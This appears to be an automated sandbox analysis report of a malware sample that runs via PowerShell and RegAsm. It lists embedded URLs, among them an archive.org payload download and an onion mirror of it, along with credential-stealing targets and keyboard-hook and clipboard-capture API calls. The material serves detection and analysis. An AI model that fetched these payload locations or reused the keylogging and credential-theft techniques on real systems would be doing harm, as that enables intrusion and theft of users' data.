                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42Hq5?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42eYr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42pjY?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6K5wX?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6pevu?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8I0Dg?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8uJZv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHxwMU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAJhH73?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAhvyvD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtB8UA?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBduP?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBnuN?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCLD9?h=368&w=522&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCr7K?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCzBA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyXtPP?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzl6aj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17cJeH?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dAYk?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dJEo?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dLTg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dOHE?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dWNo?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dtuY?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e0XT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e3cA?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e5NB?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e7Ai?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e9Q0?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17eeI9?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17ejTJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYMDHp?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBZbaoj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBh7lZF?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlKGpe?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlPHfm?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnMzWD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqRcpR?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: powershell.exe, 00000007.00000002.365223710.0000000003489000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://o.aolcdn.com/ads/adswrappermsni.js
                  Source: powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                  Source: powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                  Source: powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                  Source: powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
                  Source: powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
                  Source: powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
                  Source: powershell.exe, 00000005.00000002.369133356.0000000002461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.364796787.0000000002461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/_h/975a7d20/webcore/externalscripts/jquery/jquer
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/css/f15f847b-3b9d03a9/directi
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-7e75174a/directio
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-80c466c0/directio
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/6b/7fe9d7.woff
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/c6/cfdbd9.png
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/64bfc5b6/webcore/externalscripts/oneTrust/de-
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/a1438951/webcore/externalscripts/oneTrust/ski
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/css/f60532dd-8d94f807/directi
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-2923b6c2/directio
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-a12f0134/directio
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/21/241a2c.woff
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA2oHEB.img?h=16&w=16&m
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42Hq5.img?h=16&w=16&m
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42eYr.img?h=16&w=16&m
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42pjY.img?h=16&w=16&m
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6K5wX.img?h=16&w=16&m
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6pevu.img?h=16&w=16&m
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8I0Dg.img?h=16&w=16&m
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8uJZv.img?h=16&w=16&m
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHxwMU.img?h=16&w=16&m
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAJhH73.img?h=16&w=16&m
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAgi0nZ.img?h=16&w=16&m
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAhvyvD.img?h=16&w=16&m
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtB8UA.img?h=166&w=310
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBduP.img?h=75&w=100&
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBnuN.img?h=166&w=310
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCLD9.img?h=368&w=522
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCr7K.img?h=75&w=100&
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCzBA.img?h=250&w=300
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXtPP.img?h=16&w=16&m
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzl6aj.img?h=16&w=16&m
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17cJeH.img?h=250&w=30
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dAYk.img?h=75&w=100
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dJEo.img?h=75&w=100
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dLTg.img?h=166&w=31
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dOHE.img?h=333&w=31
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dWNo.img?h=166&w=31
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dtuY.img?h=333&w=31
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e0XT.img?h=166&w=31
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e3cA.img?h=75&w=100
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e5NB.img?h=75&w=100
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e7Ai.img?h=250&w=30
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e9Q0.img?h=166&w=31
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eeI9.img?h=75&w=100
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17ejTJ.img?h=75&w=100
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBYMDHp.img?h=27&w=27&m
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&m
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBh7lZF.img?h=333&w=311
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlKGpe.img?h=75&w=100&
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlPHfm.img?h=16&w=16&m
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnMzWD.img?h=16&w=16&m
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBqRcpR.img?h=16&w=16&m
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
                  Source: powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
                  Source: powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                  Source: RegAsm.exe, RegAsm.exe, 0000000E.00000002.378253286.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com
                  Source: RegAsm.exe, RegAsm.exe, 0000000E.00000002.378253286.0000000000400000.00000040.80000000.00040000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.378441374.00000000008C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.imvu.com
                  Source: RegAsm.exe, 0000000E.00000002.378106098.000000000034C000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.imvu.com/HK
                  Source: RegAsm.exe, 0000000E.00000002.378253286.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                  Source: RegAsm.exe, 0000000E.00000002.378253286.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comr
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://www.msn.com/
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://www.msn.com/?ocid=iehp
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://www.msn.com/advertisement.ad.js
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
                  Source: RegAsm.exe, 0000000E.00000002.378253286.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net/
                  Source: RegAsm.exe, 0000000B.00000002.380657934.0000000000374000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net0
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
                  Source: powershell.exe, 00000007.00000002.364796787.000000000259A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://archive.org
                  Source: powershell.exe, 00000005.00000002.369133356.00000000025B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://archive.org/download/new_image_vbs/new_imaLR
                  Source: powershell.exe, 00000007.00000002.366941272.0000000004F00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://archive.org/download/new_image_vbs/new_image_vbs.jpg
                  Source: powershell.exe, 00000007.00000002.364796787.00000000026B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.364796787.000000000269E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://archive6zg5vrdwm4ljllgxleekeoj43lqayscd4d4kmhnyblq4h3ead.onion/download/new_image_vbs/new_im
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: https://contextual.media.net/
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: https://contextual.media.net/8/nrrV73987.js
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
                  Source: powershell.exe, 00000007.00000002.365223710.0000000003489000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000007.00000002.365223710.0000000003489000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000007.00000002.365223710.0000000003489000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
                  Source: RegAsm.exe	String found in binary or memory: https://login.yahoo.com/config/login
                  Source: powershell.exe, 00000007.00000002.365223710.0000000003489000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
                  Source: powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                  Source: RegAsm.exe, 0000000B.00000002.381064244.00000000025C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
                  Source: RegAsm.exe, RegAsm.exe, 0000000E.00000002.378253286.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
                  Source: RegAsm.exe	String found in binary or memory: https://www.google.com/accounts/servicelogin
                  Source: bhv5928.tmp.11.dr	String found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
                  Source: unknown	Network traffic detected: HTTP traffic on port 49162 -> 443
                  Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49162

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,00000000 (idHook 0x0D = WH_KEYBOARD_LL, a low-level keyboard hook, i.e. keystroke capture)	8_2_0040A2F3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard	8_2_0040B749
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard	8_2_004168FC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard	11_2_0040987A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard	11_2_004098E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard	12_2_00406DFC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard	12_2_00406E9F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard	14_2_004068B5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard	14_2_004072B5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx	8_2_0040A41B
